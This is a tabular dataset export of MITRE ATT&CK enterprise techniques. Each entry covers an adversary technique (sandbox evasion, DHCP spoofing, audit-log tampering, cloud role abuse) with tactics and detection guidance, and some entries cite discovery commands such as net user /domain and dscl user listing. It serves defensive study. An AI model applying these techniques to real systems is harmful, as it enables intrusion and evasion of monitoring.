ID
stringlengths 5
9
| name
stringlengths 5
102
| description
stringlengths 207
4.68k
| created
stringlengths 11
17
| domain
stringclasses 1
value | tactics
stringclasses 30
values | detection
stringlengths 89
3.21k
⌀ |
---|---|---|---|---|---|---|
T1497 | Virtualization/Sandbox Evasion | Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)
Adversaries may use several methods to accomplish [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) such as checking for security monitoring tools (e.g., Sysinternals, Wireshark, etc.) or other system artifacts associated with analysis or virtualization. Adversaries may also check for legitimate user activity to help determine if it is in an analysis environment. Additional methods include use of sleep timers or loops within malware code to avoid operating within a temporary sandbox.(Citation: Unit 42 Pirpi July 2015)
| 17 April 2019 | enterprise-attack | Defense Evasion, Discovery | Virtualization, sandbox, user activity, and related discovery techniques will likely occur in the first steps of an operation but may also occur throughout as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as lateral movement, based on the information obtained. Detecting actions related to virtualization and sandbox identification may be difficult depending on the adversary's implementation and monitoring required. Monitoring for suspicious processes being spawned that gather a variety of system information or perform other forms of Discovery, especially in a short period of time, may aid in detection. |
T1542 | Pre-OS Boot | Adversaries may abuse Pre-OS Boot mechanisms as a way to establish persistence on a system. During the booting process of a computer, firmware and various startup services are loaded before the operating system. These programs control flow of execution before the operating system takes control.(Citation: Wikipedia Booting)
Adversaries may overwrite data in boot drivers or firmware such as BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) to persist on systems at a layer below the operating system. This can be particularly difficult to detect as malware at this level will not be detected by host software-based defenses. | 13 November 2019 | enterprise-attack | Defense Evasion, Persistence | Perform integrity checking on pre-OS boot mechanisms that can be manipulated for malicious purposes. Take snapshots of boot records and firmware and compare against known good images. Log changes to boot records, BIOS, and EFI, which can be performed by API calls, and compare against known good behavior and patching.
Disk check, forensic utilities, and data from device drivers (i.e. processes and API calls) may reveal anomalies that warrant deeper investigation.(Citation: ITWorld Hard Disk Health Dec 2014) |
T1562.011 | Impair Defenses: Spoof Security Alerting | Adversaries may spoof security alerting from tools, presenting false evidence to impair defenders’ awareness of malicious activity.(Citation: BlackBasta) Messages produced by defensive tools contain information about potential security events as well as the functioning status of security software and the system. Security reporting messages are important for monitoring the normal operation of a system and identifying important events that can signal a security incident.
Rather than or in addition to [Indicator Blocking](https://attack.mitre.org/techniques/T1562/006), an adversary can spoof positive affirmations that security tools are continuing to function even after legitimate security tools have been disabled (e.g., [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001)). An adversary can also present a “healthy” system status even after infection. This can be abused to enable further malicious activity by delaying defender responses.
For example, adversaries may show a fake Windows Security GUI and tray icon with a “healthy” system status after Windows Defender and other system tools have been disabled.(Citation: BlackBasta) | 14 March 2023 | enterprise-attack | Defense Evasion | null |
T1016 | System Network Configuration Discovery | Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include [Arp](https://attack.mitre.org/software/S0099), [ipconfig](https://attack.mitre.org/software/S0100)/[ifconfig](https://attack.mitre.org/software/S0101), [nbtstat](https://attack.mitre.org/software/S0102), and [route](https://attack.mitre.org/software/S0103).
Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to gather information about configurations and settings, such as IP addresses of configured interfaces and static/dynamic routes (e.g. <code>show ip route</code>, <code>show ip interface</code>).(Citation: US-CERT-TA18-106A)(Citation: Mandiant APT41 Global Intrusion )
Adversaries may use the information from [System Network Configuration Discovery](https://attack.mitre.org/techniques/T1016) during automated discovery to shape follow-on behaviors, including determining certain access within the target network and what actions to do next. | 31 May 2017 | enterprise-attack | Discovery | System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Further, {{LinkById|T1059.008} commands may also be used to gather system and network information with built-in features native to the network device platform. Monitor CLI activity for unexpected or unauthorized use commands being run by non-standard users from non-standard locations. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). |
T1216 | System Script Proxy Execution | Adversaries may use trusted scripts, often signed with certificates, to proxy the execution of malicious files. Several Microsoft signed scripts that have been downloaded from Microsoft or are default on Windows installations can be used to proxy execution of other files.(Citation: LOLBAS Project) This behavior may be abused by adversaries to execute malicious files that could bypass application control and signature validation on systems.(Citation: GitHub Ultimate AppLocker Bypass List) | 18 April 2018 | enterprise-attack | Defense Evasion | Monitor script processes, such as `cscript`, and command-line parameters for scripts like PubPrn.vbs that may be used to proxy execution of malicious files. |
T1557.003 | Adversary-in-the-Middle: DHCP Spoofing | Adversaries may redirect network traffic to adversary-owned systems by spoofing Dynamic Host Configuration Protocol (DHCP) traffic and acting as a malicious DHCP server on the victim network. By achieving the adversary-in-the-middle (AiTM) position, adversaries may collect network communications, including passed credentials, especially those sent over insecure, unencrypted protocols. This may also enable follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040) or [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002).
DHCP is based on a client-server model and has two functionalities: a protocol for providing network configuration settings from a DHCP server to a client and a mechanism for allocating network addresses to clients.(Citation: rfc2131) The typical server-client interaction is as follows:
1. The client broadcasts a `DISCOVER` message.
2. The server responds with an `OFFER` message, which includes an available network address.
3. The client broadcasts a `REQUEST` message, which includes the network address offered.
4. The server acknowledges with an `ACK` message and the client receives the network configuration parameters.
Adversaries may spoof as a rogue DHCP server on the victim network, from which legitimate hosts may receive malicious network configurations. For example, malware can act as a DHCP server and provide adversary-owned DNS servers to the victimized computers.(Citation: new_rogue_DHCP_serv_malware)(Citation: w32.tidserv.g) Through the malicious network configurations, an adversary may achieve the AiTM position, route client traffic through adversary-controlled systems, and collect information from the client network.
DHCPv6 clients can receive network configuration information without being assigned an IP address by sending a <code>INFORMATION-REQUEST (code 11)</code> message to the <code>All_DHCP_Relay_Agents_and_Servers</code> multicast address.(Citation: rfc3315) Adversaries may use their rogue DHCP server to respond to this request message with malicious network configurations.
Rather than establishing an AiTM position, adversaries may also abuse DHCP spoofing to perform a DHCP exhaustion attack (i.e, [Service Exhaustion Flood](https://attack.mitre.org/techniques/T1499/002)) by generating many broadcast DISCOVER messages to exhaust a network’s DHCP allocation pool. | 24 March 2022 | enterprise-attack | Collection, Credential Access | Monitor network traffic for suspicious/malicious behavior involving DHCP, such as changes in DNS and/or gateway parameters. Additionally, monitor Windows logs for Event IDs (EIDs) 1341, 1342, 1020 and 1063, which specify that the IP allocations are low or have run out; these EIDs may indicate a denial of service attack.(Citation: dhcp_serv_op_events)(Citation: solution_monitor_dhcp_scopes) |
T1584.006 | Compromise Infrastructure: Web Services | Adversaries may compromise access to third-party web services that can be used during targeting. A variety of popular websites exist for legitimate users to register for web-based services, such as GitHub, Twitter, Dropbox, Google, SendGrid, etc. Adversaries may try to take ownership of a legitimate user's access to a web service and use that web service as infrastructure in support of cyber operations. Such web services can be abused during later stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)), [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567), or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Recorded Future Turla Infra 2020) Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. By utilizing a web service, particularly when access is stolen from legitimate users, adversaries can make it difficult to physically tie back operations to them. Additionally, leveraging compromised web-based email services may allow adversaries to leverage the trust associated with legitimate domains. | 01 October 2020 | enterprise-attack | Resource Development | Once adversaries leverage the abused web service as infrastructure (ex: for command and control), it may be possible to look for unique characteristics associated with adversary software, if known.(Citation: ThreatConnect Infrastructure Dec 2020)
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)) or [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567). |
T1090.001 | Proxy: Internal Proxy | Adversaries may use an internal proxy to direct command and control traffic between two or more systems in a compromised environment. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use internal proxies to manage command and control communications inside a compromised environment, to reduce the number of simultaneous outbound network connections, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between infected systems to avoid suspicion. Internal proxy connections may use common peer-to-peer (p2p) networking protocols, such as SMB, to better blend in with the environment.
By using a compromised internal system as a proxy, adversaries may conceal the true destination of C2 traffic while reducing the need for numerous connections to external systems. | 14 March 2020 | enterprise-attack | Command and Control | Analyze network data for uncommon data flows between clients that should not or often do not communicate with one another. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2) |
T1585.001 | Establish Accounts: Social Media Accounts | Adversaries may create and cultivate social media accounts that can be used during targeting. Adversaries can create social media accounts that can be used to build a persona to further operations. Persona development consists of the development of public information, presence, history and appropriate affiliations.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage)
For operations incorporating social engineering, the utilization of a persona on social media may be important. These personas may be fictitious or impersonate real people. The persona may exist on a single social media site or across multiple sites (ex: Facebook, LinkedIn, Twitter, etc.). Establishing a persona on social media may require development of additional documentation to make them seem real. This could include filling out profile information, developing social networks, or incorporating photos.
Once a persona has been developed an adversary can use it to create connections to targets of interest. These connections may be direct or may include trying to connect through others.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage) These accounts may be leveraged during other phases of the adversary lifecycle, such as during Initial Access (ex: [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003)). | 01 October 2020 | enterprise-attack | Resource Development | Consider monitoring social media activity related to your organization. Suspicious activity may include personas claiming to work for your organization or recently created/modified accounts making numerous connection requests to accounts affiliated with your organization.
Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access (ex: [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003)). |
T1027.013 | Obfuscated Files or Information: Encrypted/Encoded File | Adversaries may encrypt or encode files to obfuscate strings, bytes, and other specific patterns to impede detection. Encrypting and/or encoding file content aims to conceal malicious artifacts within a file used in an intrusion. Many other techniques, such as [Software Packing](https://attack.mitre.org/techniques/T1027/002), [Steganography](https://attack.mitre.org/techniques/T1027/003), and [Embedded Payloads](https://attack.mitre.org/techniques/T1027/009), share this same broad objective. Encrypting and/or encoding files could lead to a lapse in detection of static signatures, only for this malicious content to be revealed (i.e., [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140)) at the time of execution/use.
This type of file obfuscation can be applied to many file artifacts present on victim hosts, such as malware log/configuration and payload files.(Citation: File obfuscation) Files can be encrypted with a hardcoded or user-supplied key, as well as otherwise obfuscated using standard encoding/compression schemes such as Base64.
The entire content of a file may be obfuscated, or just specific functions or values (such as C2 addresses). Encryption and encoding may also be applied in redundant layers for additional protection.
For example, adversaries may abuse password-protected Word documents or self-extracting (SFX) archives as a method of encrypting/encoding a file such as a [Phishing](https://attack.mitre.org/techniques/T1566) payload. These files typically function by attaching the intended archived content to a decompressor stub that is executed when the file is invoked (e.g., [User Execution](https://attack.mitre.org/techniques/T1204)).(Citation: SFX - Encrypted/Encoded File)
Adversaries may also abuse file-specific as well as custom encoding schemes. For example, Byte Order Mark (BOM) headers in text files may be abused to manipulate and obfuscate file content until [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) execution. | 29 March 2024 | enterprise-attack | Defense Evasion | null |
T1033 | System Owner/User Discovery | Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Various utilities and commands may acquire this information, including <code>whoami</code>. In macOS and Linux, the currently logged in user can be identified with <code>w</code> and <code>who</code>. On macOS the <code>dscl . list /Users | grep -v '_'</code> command can also be used to enumerate user accounts. Environment variables, such as <code>%USERNAME%</code> and <code>$USER</code>, may also be used to access this information.
On network devices, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `show users` and `show ssh` can be used to display users currently logged into the device.(Citation: show_ssh_users_cmd_cisco)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018) | 31 May 2017 | enterprise-attack | Discovery | `System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.
Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
For network infrastructure devices, collect AAA logging to monitor `show` commands being run by non-standard users from non-standard locations. |
T1563 | Remote Service Session Hijacking | Adversaries may take control of preexisting sessions with remote services to move laterally in an environment. Users may use valid credentials to log into a service specifically designed to accept remote connections, such as telnet, SSH, and RDP. When a user logs into a service, a session will be established that will allow them to maintain a continuous interaction with that service.
Adversaries may commandeer these sessions to carry out actions on remote systems. [Remote Service Session Hijacking](https://attack.mitre.org/techniques/T1563) differs from use of [Remote Services](https://attack.mitre.org/techniques/T1021) because it hijacks an existing session rather than creating a new session using [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: RDP Hijacking Medium)(Citation: Breach Post-mortem SSH Hijack) | 25 February 2020 | enterprise-attack | Lateral Movement | Use of these services may be legitimate, depending upon the network environment and how it is used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with that service. Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time.
Monitor for processes and command-line arguments associated with hijacking service sessions. |
T1087.002 | Account Discovery: Domain Account | Adversaries may attempt to get a listing of domain accounts. This information can help adversaries determine which domain accounts exist to aid in follow-on behavior such as targeting specific accounts which possess particular privileges.
Commands such as <code>net user /domain</code> and <code>net group /domain</code> of the [Net](https://attack.mitre.org/software/S0039) utility, <code>dscacheutil -q group</code>on macOS, and <code>ldapsearch</code> on Linux can list domain users and groups. [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets including <code>Get-ADUser</code> and <code>Get-ADGroupMember</code> may enumerate members of Active Directory groups.(Citation: CrowdStrike StellarParticle January 2022) | 21 February 2020 | enterprise-attack | Discovery | System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
|
T1562.012 | Impair Defenses: Disable or Modify Linux Audit System | Adversaries may disable or modify the Linux audit system to hide malicious activity and avoid detection. Linux admins use the Linux Audit system to track security-relevant information on a system. The Linux Audit system operates at the kernel-level and maintains event logs on application and system activity such as process, network, file, and login events based on pre-configured rules.
Often referred to as `auditd`, this is the name of the daemon used to write events to disk and is governed by the parameters set in the `audit.conf` configuration file. Two primary ways to configure the log generation rules are through the command line `auditctl` utility and the file `/etc/audit/audit.rules`, containing a sequence of `auditctl` commands loaded at boot time.(Citation: Red Hat System Auditing)(Citation: IzyKnows auditd threat detection 2022)
With root privileges, adversaries may be able to ensure their activity is not logged through disabling the Audit system service, editing the configuration/rule files, or by hooking the Audit system library functions. Using the command line, adversaries can disable the Audit system service through killing processes associated with `auditd` daemon or use `systemctl` to stop the Audit service. Adversaries can also hook Audit system functions to disable logging or modify the rules contained in the `/etc/audit/audit.rules` or `audit.conf` files to ignore malicious activity.(Citation: Trustwave Honeypot SkidMap 2023)(Citation: ESET Ebury Feb 2014) | 24 May 2023 | enterprise-attack | Defense Evasion | null |
T1078.004 | Valid Accounts: Cloud Accounts | Valid accounts in cloud environments may allow adversaries to perform actions to achieve Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application. Cloud Accounts can exist solely in the cloud; alternatively, they may be hybrid-joined between on-premises systems and the cloud through syncing or federation with other identity sources such as Windows Active Directory. (Citation: AWS Identity Federation)(Citation: Google Federating GC)(Citation: Microsoft Deploying AD Federation)
Service or user accounts may be targeted by adversaries through [Brute Force](https://attack.mitre.org/techniques/T1110), [Phishing](https://attack.mitre.org/techniques/T1566), or various other means to gain access to the environment. Federated or synced accounts may be a pathway for the adversary to affect both on-premises systems and cloud environments - for example, by leveraging shared credentials to log onto [Remote Services](https://attack.mitre.org/techniques/T1021). High privileged cloud accounts, whether federated, synced, or cloud-only, may also allow pivoting to on-premises environments by leveraging SaaS-based [Software Deployment Tools](https://attack.mitre.org/techniques/T1072) to run commands on hybrid-joined devices.
An adversary may create long lasting [Additional Cloud Credentials](https://attack.mitre.org/techniques/T1098/001) on a compromised cloud account to maintain persistence in the environment. Such credentials may also be used to bypass security controls such as multi-factor authentication.
Cloud accounts may also be able to assume [Temporary Elevated Cloud Access](https://attack.mitre.org/techniques/T1548/005) or other privileges through various means within the environment. Misconfigurations in role assignments or role assumption policies may allow an adversary to use these mechanisms to leverage permissions outside the intended scope of the account. Such over privileged accounts may be used to harvest sensitive data from online storage accounts and databases through [Cloud API](https://attack.mitre.org/techniques/T1059/009) or other methods.
| 13 March 2020 | enterprise-attack | Defense Evasion, Initial Access, Persistence, Privilege Escalation | Monitor the activity of cloud accounts to detect abnormal or malicious behavior, such as accessing information outside of the normal function of the account or account usage at atypical hours. |
T1016.001 | System Network Configuration Discovery: Internet Connection Discovery | Adversaries may check for Internet connectivity on compromised systems. This may be performed during automated discovery and can be accomplished in numerous ways such as using [Ping](https://attack.mitre.org/software/S0097), <code>tracert</code>, and GET requests to websites.
Adversaries may use the results and responses from these requests to determine if the system is capable of communicating with their C2 servers before attempting to connect to them. The results may also be used to identify routes, redirectors, and proxy servers. | 17 March 2021 | enterprise-attack | Discovery | System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Command and Control, based on the information obtained.
Monitor processes and command-line arguments for actions that could be taken to check Internet connectivity. |
T1594 | Search Victim-Owned Websites | Adversaries may search websites owned by the victim for information that can be used during targeting. Victim-owned websites may contain a variety of details, including names of departments/divisions, physical locations, and data about key employees such as names, roles, and contact info (ex: [Email Addresses](https://attack.mitre.org/techniques/T1589/002)). These sites may also have details highlighting business operations and relationships.(Citation: Comparitech Leak)
Adversaries may search victim-owned websites to gather actionable information. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199) or [Phishing](https://attack.mitre.org/techniques/T1566)). | 02 October 2020 | enterprise-attack | Reconnaissance | Monitor for suspicious network traffic that could be indicative of adversary reconnaissance, such as rapid successions of requests indicative of web crawling and/or large quantities of requests originating from a single source (especially if the source is known to be associated with an adversary). Analyzing web metadata may also reveal artifacts that can be attributed to potentially malicious activity, such as referer or user-agent string HTTP/S fields. |
T1070.007 | Indicator Removal: Clear Network Connection History and Configurations | Adversaries may clear or remove evidence of malicious network connections in order to clean up traces of their operations. Configuration settings as well as various artifacts that highlight connection history may be created on a system and/or in application logs from behaviors that require network connections, such as [Remote Services](https://attack.mitre.org/techniques/T1021) or [External Remote Services](https://attack.mitre.org/techniques/T1133). Defenders may use these artifacts to monitor or otherwise analyze network connections created by adversaries.
Network connection history may be stored in various locations. For example, RDP connection history may be stored in Windows Registry values under (Citation: Microsoft RDP Removal):
* <code>HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default</code>
* <code>HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers</code>
Windows may also store information about recent RDP connections in files such as <code>C:\Users\\%username%\Documents\Default.rdp</code> and `C:\Users\%username%\AppData\Local\Microsoft\Terminal
Server Client\Cache\`.(Citation: Moran RDPieces) Similarly, macOS and Linux hosts may store information highlighting connection history in system logs (such as those stored in `/Library/Logs` and/or `/var/log/`).(Citation: Apple Culprit Access)(Citation: FreeDesktop Journal)(Citation: Apple Unified Log Analysis Remote Login and Screen Sharing)
Malicious network connections may also require changes to third-party applications or network configuration settings, such as [Disable or Modify System Firewall](https://attack.mitre.org/techniques/T1562/004) or tampering to enable [Proxy](https://attack.mitre.org/techniques/T1090). Adversaries may delete or modify this data to conceal indicators and/or impede defensive analysis. | 15 June 2022 | enterprise-attack | Defense Evasion | null |
T1574 | Hijack Execution Flow | Adversaries may execute their own malicious payloads by hijacking the way operating systems run programs. Hijacking execution flow can be for the purposes of persistence, since this hijacked execution may reoccur over time. Adversaries may also use these mechanisms to elevate privileges or evade defenses, such as application control or other restrictions on execution.
There are many ways an adversary may hijack the flow of execution, including by manipulating how the operating system locates programs to be executed. How the operating system locates libraries to be used by a program can also be intercepted. Locations where the operating system looks for programs/resources, such as file directories and in the case of Windows the Registry, could also be poisoned to include malicious payloads. | 12 March 2020 | enterprise-attack | Defense Evasion, Persistence, Privilege Escalation | Monitor file systems for moving, renaming, replacing, or modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared with past behavior) that do not correlate with known software, patches, etc., are suspicious. Monitor DLLs loaded into a process and detect DLLs that have the same file name but abnormal paths. Modifications to or creation of .manifest and .local redirection files that do not correlate with software updates are suspicious.
Look for changes to binaries and service executables that may normally occur during software updates. If an executable is written, renamed, and/or moved to match an existing service executable, it could be detected and correlated with other suspicious behavior. Hashing of binaries and service executables could be used to detect replacement against historical data.
Monitor for changes to environment variables, as well as the commands to implement these changes.
Monitor processes for unusual activity (e.g., a process that does not use the network begins to do so, abnormal process call trees). Track library metadata, such as a hash, and compare libraries that are loaded at process execution time against previous executions to detect differences that do not correlate with patching or updates.
Service changes are reflected in the Registry. Modification to existing services should not occur frequently. If a service binary path or failure parameters are changed to values that are not typical for that service and does not correlate with software updates, then it may be due to malicious activity. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.
Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current service information. (Citation: Autoruns for Windows) Suspicious program execution through services may show up as outlier processes that have not been seen before when compared against historical data. |
T1011 | Exfiltration Over Other Network Medium | Adversaries may attempt to exfiltrate data over a different network medium than the command and control channel. If the command and control network is a wired Internet connection, the exfiltration may occur, for example, over a WiFi connection, modem, cellular data connection, Bluetooth, or another radio frequency (RF) channel.
Adversaries may choose to do this if they have sufficient access or proximity, and the connection might not be secured or defended as well as the primary Internet-connected channel because it is not routed through the same enterprise network. | 31 May 2017 | enterprise-attack | Exfiltration | Monitor for processes utilizing the network that do not normally have network communication or have never been seen before. Processes that normally require user-driven events to access the network (for example, a web browser opening with a mouse click or key press) but access the network without such may be malicious.
Monitor for and investigate changes to host adapter settings, such as addition and/or replication of communication interfaces. |
T1059.001 | Command and Scripting Interpreter: PowerShell | Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.(Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the <code>Start-Process</code> cmdlet which can be used to run an executable and the <code>Invoke-Command</code> cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
PowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk.
A number of PowerShell-based offensive testing tools are available, including [Empire](https://attack.mitre.org/software/S0363), [PowerSploit](https://attack.mitre.org/software/S0194), [PoshC2](https://attack.mitre.org/software/S0378), and PSAttack.(Citation: Github PSAttack)
PowerShell commands/scripts can also be executed without directly invoking the <code>powershell.exe</code> binary through interfaces to PowerShell's underlying <code>System.Management.Automation</code> assembly DLL exposed through the .NET framework and Windows Common Language Interface (CLI).(Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)(Citation: Microsoft PSfromCsharp APR 2014) | 09 March 2020 | enterprise-attack | Execution | If proper execution policy is set, adversaries will likely be able to define their own execution policy if they obtain administrator or system access, either through the Registry or at the command line. This change in policy on a system may be a way to detect malicious use of PowerShell. If PowerShell is not used in an environment, then simply looking for PowerShell execution may detect malicious activity.
Monitor for loading and/or execution of artifacts associated with PowerShell specific assemblies, such as System.Management.Automation.dll (especially to unusual process names/locations).(Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)
It is also beneficial to turn on PowerShell logging to gain increased fidelity in what occurs during execution (which is applied to .NET invocations). (Citation: Malware Archaeology PowerShell Cheat Sheet) PowerShell 5.0 introduced enhanced logging capabilities, and some of those features have since been added to PowerShell 4.0. Earlier versions of PowerShell do not have many logging features.(Citation: FireEye PowerShell Logging 2016) An organization can gather PowerShell execution details in a data analytic platform to supplement it with other data.
Consider monitoring for Windows event ID (EID) 400, which shows the version of PowerShell executing in the <code>EngineVersion</code> field (which may also be relevant to detecting a potential [Downgrade Attack](https://attack.mitre.org/techniques/T1562/010)) as well as if PowerShell is running locally or remotely in the <code>HostName</code> field. Furthermore, EID 400 may indicate the start time and EID 403 indicates the end time of a PowerShell session.(Citation: inv_ps_attacks) |
T1020.001 | Automated Exfiltration: Traffic Duplication | Adversaries may leverage traffic mirroring in order to automate data exfiltration over compromised infrastructure. Traffic mirroring is a native feature for some devices, often used for network analysis. For example, devices may be configured to forward network traffic to one or more destinations for analysis by a network analyzer or other monitoring device. (Citation: Cisco Traffic Mirroring)(Citation: Juniper Traffic Mirroring)
Adversaries may abuse traffic mirroring to mirror or redirect network traffic through other infrastructure they control. Malicious modifications to network devices to enable traffic redirection may be possible through [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) or [Patch System Image](https://attack.mitre.org/techniques/T1601/001).(Citation: US-CERT-TA18-106A)(Citation: Cisco Blog Legacy Device Attacks)
Many cloud-based environments also support traffic mirroring. For example, AWS Traffic Mirroring, GCP Packet Mirroring, and Azure vTap allow users to define specified instances to collect traffic from and specified targets to send collected traffic to.(Citation: AWS Traffic Mirroring)(Citation: GCP Packet Mirroring)(Citation: Azure Virtual Network TAP)
Adversaries may use traffic duplication in conjunction with [Network Sniffing](https://attack.mitre.org/techniques/T1040), [Input Capture](https://attack.mitre.org/techniques/T1056), or [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) depending on the goals and objectives of the adversary. | 19 October 2020 | enterprise-attack | Exfiltration | Monitor network traffic for uncommon data flows (e.g. unusual network communications, suspicious communications that have never been seen before, communications sending fixed size data packets at regular intervals). Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. |
T1098.003 | Account Manipulation: Additional Cloud Roles | An adversary may add additional roles or permissions to an adversary-controlled cloud account to maintain persistent access to a tenant. For example, adversaries may update IAM policies in cloud-based environments or add a new global administrator in Office 365 environments.(Citation: AWS IAM Policies and Permissions)(Citation: Google Cloud IAM Policies)(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: Microsoft O365 Admin Roles) With sufficient permissions, a compromised account can gain almost unlimited access to data and settings (including the ability to reset the passwords of other admins).(Citation: Expel AWS Attacker)
(Citation: Microsoft O365 Admin Roles)
This account modification may immediately follow [Create Account](https://attack.mitre.org/techniques/T1136) or other malicious account activity. Adversaries may also modify existing [Valid Accounts](https://attack.mitre.org/techniques/T1078) that they have compromised. This could lead to privilege escalation, particularly if the roles added allow for lateral movement to additional accounts.
For example, in AWS environments, an adversary with appropriate permissions may be able to use the <code>CreatePolicyVersion</code> API to define a new version of an IAM policy or the <code>AttachUserPolicy</code> API to attach an IAM policy with additional or distinct permissions to a compromised user account.(Citation: Rhino Security Labs AWS Privilege Escalation)
In some cases, adversaries may add roles to adversary-controlled accounts outside the victim cloud tenant. This allows these external accounts to perform actions inside the victim tenant without requiring the adversary to [Create Account](https://attack.mitre.org/techniques/T1136) or modify a victim-owned account.(Citation: Invictus IR DangerDev 2024) | 19 January 2020 | enterprise-attack | Persistence, Privilege Escalation | Collect activity logs from IAM services and cloud administrator accounts to identify unusual activity in the assignment of roles to those accounts. Monitor for accounts assigned to admin roles that go over a certain threshold of known admins. |
